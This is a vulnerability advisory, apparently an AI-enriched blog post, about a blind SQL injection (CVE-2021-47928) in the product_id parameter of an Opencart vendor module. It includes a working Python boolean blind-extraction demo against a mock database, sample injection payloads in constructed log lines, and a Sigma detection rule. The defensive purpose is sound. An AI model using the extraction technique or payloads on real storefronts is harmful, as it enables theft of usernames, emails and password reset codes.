Opencart TMD Vendor System Blind SQLi Exposes User Data
The National Vulnerability Database (NVD) reports a high-severity blind SQL injection vulnerability, CVE-2021-47928, affecting Opencart TMD Vendor System 3.x. The flaw is reachable without authentication: an attacker who can send requests to the storefront can extract data from the database.
The injection point is the product_id parameter. According to the NVD, both time-based and content-based (boolean) blind injection techniques are viable, which allows an attacker to enumerate data from the oc_user table one character at a time, specifically usernames, email addresses, and password reset codes. The CVSS v3.1 score of 8.2 (HIGH) reflects a network-exploitable flaw with low attack complexity and no user interaction required.
The NVD does not specify affected versions beyond "3.x", so any organization running this Opencart module should treat itself as exposed until the vendor states otherwise. Unauthenticated access to user records is a high-value target: a leaked password reset code can be used to take over the corresponding account, and an administrator account on the store opens the way to broader compromise.
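The following added example (not code from the advisory, the module, or its vendor) shows the mechanism described above against a constructed in-memory SQLite database. The table names oc_user and oc_product are taken from the advisory; the column names, the sample rows, and the shape of the vulnerable query are assumptions. Only the content-based (boolean) form is demonstrated, because SQLite has no SLEEP(); the time-based variant follows the same pattern with a delay as the oracle instead of the presence of a row.

```python
import sqlite3

def build_db():
    """Constructed sample database standing in for the store's tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE oc_user (user_id INTEGER, username TEXT, email TEXT, code TEXT);
        INSERT INTO oc_user VALUES (1, 'admin', 'admin@example.test', 'r3setc0de');
        CREATE TABLE oc_product (product_id INTEGER, name TEXT);
        INSERT INTO oc_product VALUES (42, 'Widget');
        INSERT INTO oc_product VALUES (43, 'Gadget');
    """)
    return db

def vulnerable_lookup(db, product_id):
    """Hypothetical reconstruction of the flaw: the request parameter is
    concatenated into the SQL text, so it can carry an extra condition."""
    sql = "SELECT name FROM oc_product WHERE product_id = " + product_id
    return db.execute(sql).fetchall()

def safe_lookup(db, product_id):
    """Hardened form: a bound parameter is compared as a value, never parsed
    as SQL, so '42 AND 1=1' simply matches no product."""
    sql = "SELECT name FROM oc_product WHERE product_id = ?"
    return db.execute(sql, (product_id,)).fetchall()

def blind_extract(db, lookup, subquery, max_len=32):
    """Boolean blind extraction: recover the result of `subquery` one
    character at a time, using 'did the product row come back' as the oracle.
    Each character is found by bisecting its code point, the way real
    tooling does, instead of trying all printable characters in turn."""
    recovered = ""
    for pos in range(1, max_len + 1):
        char_expr = f"unicode(substr(({subquery}),{pos},1))"
        lo, hi = 32, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # product_id = 42 AND <condition>: a row is returned only if true
            if lookup(db, f"42 AND {char_expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        # Confirm the candidate; past the end of the string nothing matches
        if not lookup(db, f"42 AND {char_expr} = {lo}"):
            break
        recovered += chr(lo)
    return recovered

if __name__ == "__main__":
    db = build_db()
    target = "SELECT username FROM oc_user WHERE user_id = 1"
    print("vulnerable:", blind_extract(db, vulnerable_lookup, target))
    print("hardened:  ", repr(blind_extract(db, safe_lookup, target)))
```

Against the vulnerable query the loop recovers the username; against the parameterized query every probe returns no row and nothing is recovered. The same extraction works for the email and code columns by changing the subquery, which is why the advisory's "one parameter" is enough to dump the whole oc_user table.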
What This Means For You
- If your organization uses Opencart TMD Vendor System 3.x, you are directly exposed to unauthenticated data exfiltration. Confirm whether the module is deployed on any storefront and, if it is, prioritize a vendor fix or compensating controls (a WAF rule on product_id, or restricting the vendor endpoints) in the meantime. Review web server and application logs for product_id values carrying SQL fragments, for clusters of slow requests that suggest time-based probing, and for password reset codes used shortly after being issued, all of which may indicate earlier exploitation.
Related ATT&CK Techniques
- T1190 Exploit Public-Facing Application (Initial Access)
🛡️ Detection Rules
CVE-2021-47928 - Opencart TMD Vendor System Blind SQLi via product_id

```yaml
title: CVE-2021-47928 - Opencart TMD Vendor System Blind SQLi via product_id
id: scw-2026-05-10-ai-1
status: experimental
level: high
description: |
  Detects attempts to exploit CVE-2021-47928 in Opencart TMD Vendor System. The rule
  fires on requests whose query string contains 'product_id' together with all of the
  time-based blind SQL injection indicators 'SLEEP', 'AND', '(' and ')'. Match against
  the URL-decoded query string where the log pipeline provides it; content-based
  (boolean) probes that do not use SLEEP are not covered by this rule.
author: SCW Feed Engine (AI-generated)
date: 2026-05-10
references:
  - https://shimiscyberworld.com/posts/nvd-CVE-2021-47928/
tags:
  - attack.initial_access
  - attack.t1190
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query|contains|all:
      - 'product_id'
      - 'SLEEP'
      - 'AND'
      - '('
      - ')'
  condition: selection
falsepositives:
  - Legitimate administrative activity
```
Source: Shimi's Cyber World
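To see what the rule above does and does not catch, the following added example (not part of the advisory or the Sigma rule) runs the same indicator logic over a handful of constructed Apache-style access log lines. The client addresses, timestamps and the `/index.php` path are made up; the point is the difference between matching the raw query string and matching it after URL decoding, and the fact that a boolean probe without SLEEP goes undetected.

```python
import re
from urllib.parse import unquote_plus

# Indicator terms from the Sigma rule; Sigma's `contains` is case-insensitive.
INDICATORS = ("product_id", "SLEEP", "AND", "(", ")")

# Constructed log lines in Apache combined format (not real traffic).
LOG_LINES = [
    '203.0.113.5 - - [10/May/2026:16:20:01 +0000] "GET /index.php?product_id=42 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/May/2026:16:20:07 +0000] "GET /index.php?product_id=42 AND SLEEP(5) HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/May/2026:16:20:13 +0000] "GET /index.php?product_id=42%20AND%20SLEEP%285%29 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/May/2026:16:21:00 +0000] "GET /index.php?product_id=42&brand=Andersen HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/May/2026:16:22:30 +0000] "GET /index.php?product_id=42%20AND%20%28SELECT%20substr%28username%2C1%2C1%29%20FROM%20oc_user%29%3D%27a%27 HTTP/1.1" 200 512',
]

# Pull the request target out of the quoted request line; the target may
# itself contain spaces when the attacker sends an unencoded payload.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+"')

def uri_query(line):
    """Return the query string (the cs-uri-query field) of one log line."""
    m = REQ_RE.search(line)
    if not m:
        return ""
    return m.group("target").partition("?")[2]

def matches_rule(query, decode=True):
    """Apply the rule's `contains|all` test to one query string.
    With decode=True the string is URL-decoded first, which is what a
    sensible log pipeline should do before the SIEM sees the field."""
    q = unquote_plus(query) if decode else query
    low = q.lower()
    return all(tok.lower() in low for tok in INDICATORS)

def scan(lines, decode=True):
    """Return the 0-based indexes of the lines the rule fires on."""
    return [i for i, line in enumerate(lines) if matches_rule(uri_query(line), decode)]

if __name__ == "__main__":
    print("raw matching:    ", scan(LOG_LINES, decode=False))
    print("decoded matching:", scan(LOG_LINES))
```

Raw matching fires only on the second line, because in the third the parentheses are encoded as %28 and %29. Decoding catches both SLEEP probes. The last line, a content-based probe that reads a character of a username from oc_user, never contains SLEEP and is missed by this rule entirely, so a deployment that relies on it should pair it with a rule keyed on SELECT, substr or the table name, or with the request-duration anomaly that time-based probing produces.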
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2021-47928 | Affected product | Opencart TMD Vendor System 3.x |
| CVE-2021-47928 | Vulnerable parameter | product_id |
| CVE-2021-47928 | Exposed data | usernames, email addresses, password reset codes (oc_user table) |
Source & Attribution
| Field | Value |
|---|---|
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | May 10, 2026 at 16:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.